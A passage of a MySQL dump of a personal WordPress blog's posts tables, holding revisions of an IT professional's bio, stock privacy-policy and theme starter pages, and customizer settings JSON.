(847,1,'2025-09-23 04:46:17','2025-09-23 04:46:17','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 04:46:17','2025-09-23 04:46:17','',647,'https://ictbank.ir/blog/?p=847',0,'revision','',0),
(848,1,'2025-09-23 04:46:18','2025-09-23 04:46:18','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 04:46:18','2025-09-23 04:46:18','',647,'https://ictbank.ir/blog/?p=848',0,'revision','',0),
(849,1,'2025-09-23 14:05:43','2025-09-23 14:05:43','{\"version\": 3, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-hello-elementor','','','2025-09-23 14:05:43','2025-09-23 14:05:43','',0,'https://ictbank.ir/blog/wp-global-styles-hello-elementor/',0,'wp_global_styles','',0),
(851,1,'2025-09-23 14:16:17','2025-09-23 14:16:17','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 14:16:17','2025-09-23 14:16:17','',647,'https://ictbank.ir/blog/?p=851',0,'revision','',0),
(852,1,'2025-09-23 14:16:23','2025-09-23 14:16:23','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 14:16:23','2025-09-23 14:16:23','',647,'https://ictbank.ir/blog/?p=852',0,'revision','',0),
(853,1,'2025-09-23 14:16:23','2025-09-23 14:16:23','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 14:16:23','2025-09-23 14:16:23','',647,'https://ictbank.ir/blog/?p=853',0,'revision','',0),
(854,1,'2025-09-23 14:19:16','2025-09-23 14:19:16','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 14:19:16','2025-09-23 14:19:16','',647,'https://ictbank.ir/blog/?p=854',0,'revision','',0),
(855,1,'2025-09-23 14:19:21','2025-09-23 14:19:21','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 14:19:21','2025-09-23 14:19:21','',647,'https://ictbank.ir/blog/?p=855',0,'revision','',0),
(856,1,'2025-09-23 14:19:21','2025-09-23 14:19:21','<img src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" title=\"\" alt=\"\" loading=\"lazy\" /> <p>With over 13 years of experience in the IT (Banking, Financial and Investment) industry, I bring a comprehensive skillset encompassing database administration, data engineering, infrastructure management, Linux proficiency, and IT leadership. My expertise in building and maintaining robust IT infrastructures has enabled me to drive operational efficiency and cost optimization across various organizations. I am adept at managing complex projects, fostering collaborative teams, and ensuring the seamless delivery of IT solutions that align with business objectives. My passion for technology and continuous learning drives me to stay at the forefront of emerging trends and innovations, ensuring that my skills and expertise remain relevant in the ever-evolving IT landscape.</p>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2025-09-23 14:19:21','2025-09-23 14:19:21','',647,'https://ictbank.ir/blog/?p=856',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_posts2`
--
DROP TABLE IF EXISTS `wp_posts2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_posts2` (
`ID` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
`post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
`post_title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
`post_excerpt` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
`post_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'publish',
`comment_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
`ping_status` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'open',
`post_password` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`post_name` varchar(200) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`to_ping` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
`pinged` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts2`
--
LOCK TABLES `wp_posts2` WRITE;
/*!40000 ALTER TABLE `wp_posts2` DISABLE KEYS */;
INSERT INTO `wp_posts2` VALUES
(2,2,'2020-01-31 19:37:05','2020-01-31 19:37:05','<!-- wp:paragraph -->\n<p>Hi. Welcome to my blog.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My name is Masoud. I\'m a DBA and I am goint to share my experiences here with others.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Feel free to contact me and tell me your opinions.</p>\n<!-- /wp:paragraph -->','Sample Page','','trash','closed','open','','sample-page__trashed','','','2020-02-02 10:24:35','2020-02-02 10:24:35','',0,'http://ictbank.ir/blog/?page_id=2',0,'page','',0),
(3,1,'2020-01-31 19:37:05','2020-01-31 19:37:05','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Our website address is: http://ictbank.ir/blog.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What personal data we collect and why we collect it</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Comments</h3><!-- /wp:heading --><!-- wp:paragraph --><p>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Media</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Contact forms</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Cookies</h3><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select "Remember Me", your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Embedded content from other websites</h3><!-- /wp:heading --><!-- wp:paragraph --><p>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading {\"level\":3} --><h3>Analytics</h3><!-- /wp:heading --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where we send your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Your contact information</h2><!-- /wp:heading --><!-- wp:heading --><h2>Additional information</h2><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>How we protect your data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What data breach procedures we have in place</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What third parties we receive data from</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>What automated decision making and/or profiling we do with user data</h3><!-- /wp:heading --><!-- wp:heading {\"level\":3} --><h3>Industry regulatory disclosure requirements</h3><!-- /wp:heading -->','Privacy Policy','','trash','closed','open','','privacy-policy__trashed','','','2020-02-02 10:24:35','2020-02-02 10:24:35','',0,'http://ictbank.ir/blog/?page_id=3',0,'page','',0),
(4,1,'2020-01-31 19:37:37','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2020-01-31 19:37:37','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?p=4',0,'post','',0),
(5,1,'2020-02-01 06:13:14','0000-00-00 00:00:00','<!-- wp:group {\"align\":\"wide\"} --><div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\"} --><h2 class=\"has-text-align-center\">The premier destination for modern art in Northern Sweden. Open from 10 AM to 6 PM every day during the summer months.</h2><!-- /wp:heading --></div></div><!-- /wp:group --><!-- wp:columns {\"align\":\"wide\"} --><div class=\"wp-block-columns alignwide\"><!-- wp:column --><div class=\"wp-block-column\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>Works and Days</h3><!-- /wp:heading --><!-- wp:paragraph --><p>August 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>Theatre of Operations</h3><!-- /wp:heading --><!-- wp:paragraph --><p>October 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div><!-- /wp:column --><!-- wp:column --><div class=\"wp-block-column\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>The Life I Deserve</h3><!-- /wp:heading --><!-- wp:paragraph --><p>August 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:heading {\"level\":3} --><h3>From Signac to Matisse</h3><!-- /wp:heading --><!-- wp:paragraph --><p>October 1 -- December 1</p><!-- /wp:paragraph --><!-- wp:button {\"className\":\"is-style-outline\"} --><div class=\"wp-block-button is-style-outline\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Read More</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div><!-- /wp:column --></div><!-- /wp:columns --><!-- wp:image {\"align\":\"full\",\"id\":37,\"sizeSlug\":\"full\"} --><figure class=\"wp-block-image alignfull size-full\"><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png\" alt=\"\" class=\"wp-image-37\"/></figure><!-- /wp:image --><!-- wp:group {\"align\":\"wide\"} --><div class=\"wp-block-group alignwide\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\",\"textColor\":\"accent\"} --><h2 class=\"has-accent-color has-text-align-center\">”Cyborgs, as the philosopher Donna Haraway established, are not reverent. They do not remember the cosmos.”</h2><!-- /wp:heading --></div></div><!-- /wp:group --><!-- wp:paragraph {\"dropCap\":true} --><p class=\"has-drop-cap\">With seven floors of striking architecture, UMoMA shows exhibitions of international contemporary art, sometimes along with art historical retrospectives. Existential, political and philosophical issues are intrinsic to our programme. As visitor you are invited to guided tours artist talks, lectures, film screenings and other events with free admission</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>The exhibitions are produced by UMoMA in collaboration with artists and museums around the world and they often attract international attention. UMoMA has received a Special Commendation from the European Museum of the Year, and was among the top candidates for the Swedish Museum of the Year Award as well as for the Council of Europe Museum Prize.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p></p><!-- /wp:paragraph --><!-- wp:group {\"customBackgroundColor\":\"#ffffff\",\"align\":\"wide\"} --><div class=\"wp-block-group alignwide has-background\" style=\"background-color:#ffffff\"><div class=\"wp-block-group__inner-container\"><!-- wp:group --><div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:heading {\"align\":\"center\"} --><h2 class=\"has-text-align-center\">Become a Member and Get Exclusive Offers!</h2><!-- /wp:heading --><!-- wp:paragraph {\"align\":\"center\"} --><p class=\"has-text-align-center\">Members get access to exclusive exhibits and sales. Our memberships cost $99.99 and are billed annually.</p><!-- /wp:paragraph --><!-- wp:button {\"align\":\"center\"} --><div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https://make.wordpress.org/core/2019/09/27/block-editor-theme-related-updates-in-wordpress-5-3/\">Join the Club</a></div><!-- /wp:button --></div></div><!-- /wp:group --></div></div><!-- /wp:group --><!-- wp:gallery {\"ids\":[39,38],\"align\":\"wide\"} --><figure class=\"wp-block-gallery alignwide columns-2 is-cropped\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-square-2.png\" alt=\"\" data-id=\"39\" data-full-url=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-square-2.png\" data-link=\"assets/images/2020-square-2/\" class=\"wp-image-39\"/></figure></li><li class=\"blocks-gallery-item\"><figure><img src=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-square-1.png\" alt=\"\" data-id=\"38\" data-full-url=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-square-1.png\" data-link=\"http://ictbank.ir/blog/wp-content/themes/twentytwenty/assets/images/2020-square-1/\" class=\"wp-image-38\"/></figure></li></ul></figure><!-- /wp:gallery -->','The New UMoMA Opens its Doors','','auto-draft','closed','closed','','','','','2020-02-01 06:13:14','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?page_id=5',0,'page','',0),
(6,1,'2020-02-01 06:13:14','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>You might be an artist who would like to introduce yourself and your work here or maybe you’re a business with a mission to describe.</p>\n<!-- /wp:paragraph -->','About','','auto-draft','closed','closed','','','','','2020-02-01 06:13:14','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?page_id=6',0,'page','',0),
(7,1,'2020-02-01 06:13:14','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>This is a page with some basic contact information, such as an address and phone number. You might also try a plugin to add a contact form.</p>\n<!-- /wp:paragraph -->','Contact','','auto-draft','closed','closed','','','','','2020-02-01 06:13:14','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?page_id=7',0,'page','',0),
(8,1,'2020-02-01 06:13:14','0000-00-00 00:00:00','','Blog','','auto-draft','closed','closed','','','','','2020-02-01 06:13:14','0000-00-00 00:00:00','',0,'http://ictbank.ir/blog/?page_id=8',0,'page','',0),
(9,1,'2020-02-01 06:13:14','0000-00-00 00:00:00','{\n \"widget_text[2]\": {\n \"starter_content\": true,\n \"value\": {\n \"encoded_serialized_instance\": \"YTo0OntzOjU6InRpdGxlIjtzOjE1OiJBYm91dCBUaGlzIFNpdGUiO3M6NDoidGV4dCI7czo4NToiVGhpcyBtYXkgYmUgYSBnb29kIHBsYWNlIHRvIGludHJvZHVjZSB5b3Vyc2VsZiBhbmQgeW91ciBzaXRlIG9yIGluY2x1ZGUgc29tZSBjcmVkaXRzLiI7czo2OiJmaWx0ZXIiO2I6MTtzOjY6InZpc3VhbCI7YjoxO30=\",\n \"title\": \"About This Site\",\n \"is_widget_customizer_js_value\": true,\n \"instance_hash_key\": \"45a0b6339f2b2db4facea12446942836\"\n },\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"sidebars_widgets[sidebar-1]\": {\n \"starter_content\": true,\n \"value\": [\n \"text-2\"\n ],\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"widget_text[3]\": {\n \"starter_content\": true,\n \"value\": {\n \"encoded_serialized_instance\": \"YTo0OntzOjU6InRpdGxlIjtzOjc6IkZpbmQgVXMiO3M6NDoidGV4dCI7czoxNjg6IjxzdHJvbmc+QWRkcmVzczwvc3Ryb25nPgoxMjMgTWFpbiBTdHJlZXQKTmV3IFlvcmssIE5ZIDEwMDAxCgo8c3Ryb25nPkhvdXJzPC9zdHJvbmc+Ck1vbmRheSZtZGFzaDtGcmlkYXk6IDk6MDBBTSZuZGFzaDs1OjAwUE0KU2F0dXJkYXkgJmFtcDsgU3VuZGF5OiAxMTowMEFNJm5kYXNoOzM6MDBQTSI7czo2OiJmaWx0ZXIiO2I6MTtzOjY6InZpc3VhbCI7YjoxO30=\",\n \"title\": \"Find Us\",\n \"is_widget_customizer_js_value\": true,\n \"instance_hash_key\": \"622773408fae67dc0a8bb8db6e1cd023\"\n },\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"sidebars_widgets[sidebar-2]\": {\n \"starter_content\": true,\n \"value\": [\n \"text-3\"\n ],\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menus_created_posts\": {\n \"starter_content\": true,\n \"value\": [\n 5,\n 6,\n 7,\n 8\n ],\n \"type\": \"option\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu[-1]\": {\n \"starter_content\": true,\n \"value\": {\n \"name\": \"Primary\"\n },\n \"type\": \"nav_menu\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-1]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"custom\",\n \"title\": \"Home\",\n \"url\": \"http://ictbank.ir/blog/\",\n \"position\": 0,\n \"nav_menu_term_id\": -1,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-2]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"post_type\",\n \"object\": \"page\",\n \"object_id\": 6,\n \"position\": 1,\n \"nav_menu_term_id\": -1,\n \"title\": \"About\"\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-3]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"post_type\",\n \"object\": \"page\",\n \"object_id\": 8,\n \"position\": 2,\n \"nav_menu_term_id\": -1,\n \"title\": \"Blog\"\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-4]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"post_type\",\n \"object\": \"page\",\n \"object_id\": 7,\n \"position\": 3,\n \"nav_menu_term_id\": -1,\n \"title\": \"Contact\"\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"twentytwenty::nav_menu_locations[primary]\": {\n \"starter_content\": true,\n \"value\": -1,\n \"type\": \"theme_mod\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu[-5]\": {\n \"starter_content\": true,\n \"value\": {\n \"name\": \"Primary\"\n },\n \"type\": \"nav_menu\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-5]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"custom\",\n \"title\": \"Home\",\n \"url\": \"http://ictbank.ir/blog/\",\n \"position\": 0,\n \"nav_menu_term_id\": -5,\n \"object_id\": 0\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-6]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"post_type\",\n \"object\": \"page\",\n \"object_id\": 6,\n \"position\": 1,\n \"nav_menu_term_id\": -5,\n \"title\": \"About\"\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-7]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"post_type\",\n \"object\": \"page\",\n \"object_id\": 8,\n \"position\": 2,\n \"nav_menu_term_id\": -5,\n \"title\": \"Blog\"\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"nav_menu_item[-8]\": {\n \"starter_content\": true,\n \"value\": {\n \"type\": \"post_type\",\n \"object\": \"page\",\n \"object_id\": 7,\n \"position\": 3,\n \"nav_menu_term_id\": -5,\n \"title\": \"Contact\"\n },\n \"type\": \"nav_menu_item\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n \"twentytwenty::nav_menu_locations[expanded]\": {\n \"starter_content\": true,\n \"value\": -5,\n \"type\": \"theme_mod\",\n \"user_id\": 1,\n \"date_modified_gmt\": \"2020-02-01 06:13:14\"\n },\n 